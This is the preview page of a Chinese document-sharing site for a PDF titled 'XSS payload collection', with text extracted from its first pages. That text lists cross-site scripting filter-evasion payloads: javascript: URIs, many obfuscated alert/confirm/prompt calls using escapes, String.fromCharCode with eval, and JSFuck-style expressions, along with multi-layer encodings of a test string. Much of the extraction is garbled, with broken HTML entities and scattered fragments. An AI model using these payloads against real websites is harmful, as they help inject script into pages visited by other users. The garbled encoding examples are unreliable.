logo资料库

XSS payload大全.pdf

第1页 / 共112页
第2页 / 共112页
第3页 / 共112页
第4页 / 共112页
第5页 / 共112页
第6页 / 共112页
第7页 / 共112页
第8页 / 共112页
资料共112页,剩余部分请下载后查看
穿山甲 web 版,新增编码功能 http://2oep.com/index.dll http://2oep.com/encode.dll web 版,新增编码功能 M M
M M

测试不用回复

M M M M M //Google Chrome 执行 javascript:/M/,alert(%22M%22) M //Google Chrome 执行 javascript:/M/,alert(%22M%22) //Google Chrome 执行
javascript:/*- -> 测试代码:M 原始代码:M Base64 一次编码:TWFubml4 Base64 二次编码:VFdGdWJtbDQ= Unicode 一次编码:\u004d\u0061\u006e\u006e\u0069\u0078 编 Unicode 码 :\u005c\u0075\u0030\u0030\u0034\u0064\u005c\u0075\u0030\u0030\u0036\u0031\u005c \u0075\u0030\u0030\u0036\u0065\u005c\u0075\u0030\u0030\u0036\u0065\u005c\u0075\u0 030\u0030\u0036\u0039\u005c\u0075\u0030\u0030\u0037\u0038 Base16 一次编码:\x4d\x61\x6e\x6e\x69\x78 编 Base16 码 :\x5c\x78\x34\x64\x5c\x78\x36\x31\x5c\x78\x36\x65\x5c\x78\x36\x65\x5c\x78\x36\x39\x5c \x78\x37\x38 String.fromCharCode 一次编码:String.fromCharCode(77,97,110,110,105,120) 编 String.fromCharCode 码 :String.fromCharCode(83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100, 101,40,55,55,44,57,55,44,49,49,48,44,49,49,48,44,49,48,53,44,49,50,48,41) Html 十六进制实体编码一次编码:Mannix 编 Html 码 :M&� 23;x0061;&#x� 30;06e;&#x00� 二 次 六 进 二 制 实 体 次 二 次 十 编 码 二 次
36;e;&#x0069� 3b;x 编 十 制 次 次 一 二 编 编 体 体 实 实 进 进 制 十 码 Html 码:Mannix 编 码 Html 码 :&#000077& #000097&#&# 000048000110&#� 048000110&#0 000105&#0&# 00004800120 Mannix Man ni&#12 0; Hex 一次编码:d616e6e6978 Hex 二次编码:346436313665366536393738 双引号版 document.write(" 单引号 无引号 测试代码: '>"/> M \u004d\u0061\u006e\u006e\u0069\u0078 cat filename | sed -e '/^$/d' > filename cat 666.html | sed -e '/^$/d' > 888.html cat 666.txt | sed -e '/^$/d' > 888.txt alert(1)
confirm(1) prompt(1) alert('1') alert("1") alert`1` alert(1) alert(1) (alert)(1) a=alert,a(1) [1].find(alert) top["al"+"ert"](1) top["a"+"l"+"e"+"r"+"t"](1) top[/al/.source+/ert/.source](1) top[/a/.source+/l/.source+/e/.source+/r/.source+/t/.source](1) al\u0065rt(1) \u0061\u006c\u0065\u0072\u0074(1) \u0061\u006c\u0065\u0072\u0074`1` alert(1) alert(1) alert(1) alert(1) alert(1) confirm(1) confirm(� 049) confirm(1) prompt(1) prompt(1� 041 top['al\145rt'](1) top['al\145rt'] top['\141\154\145\162\164'](1) top['al\x65rt'](1) top['\x61\x6c\x65\x72\x74'](1) top[8680439..toString(30)](1) {test:new Function(String.fromCharCode(97,108,101,114,116,40,39,88,83,83,39,41))()} {test:window["alert"](1)} String.fromCharCode(97,108,101,114,116,40,39,88,83,83,39,41).replace(/.+/,eval) eval('alert(1)')// alert(String.fromCharCode(88,83,83))// alert(String.fromCharCode(88,83,83)) Set.constructor`alert\x281\x29``` alert((+[][+[]]+[])[++[[]][+[]]]+([![]]+[])[++[++[[]][+[]]][+[]]]+([!![]]+[])[++[++[++[[]][+[]]][+[]]][+[]]]+([ !![]]+[])[++[[]][+[]]]+([!![]]+[])[+[]])
prompt(-[]) alert(String.fromCharCode(49)) alert(/7/.source) 代码同下,以此类推
分享到:
收藏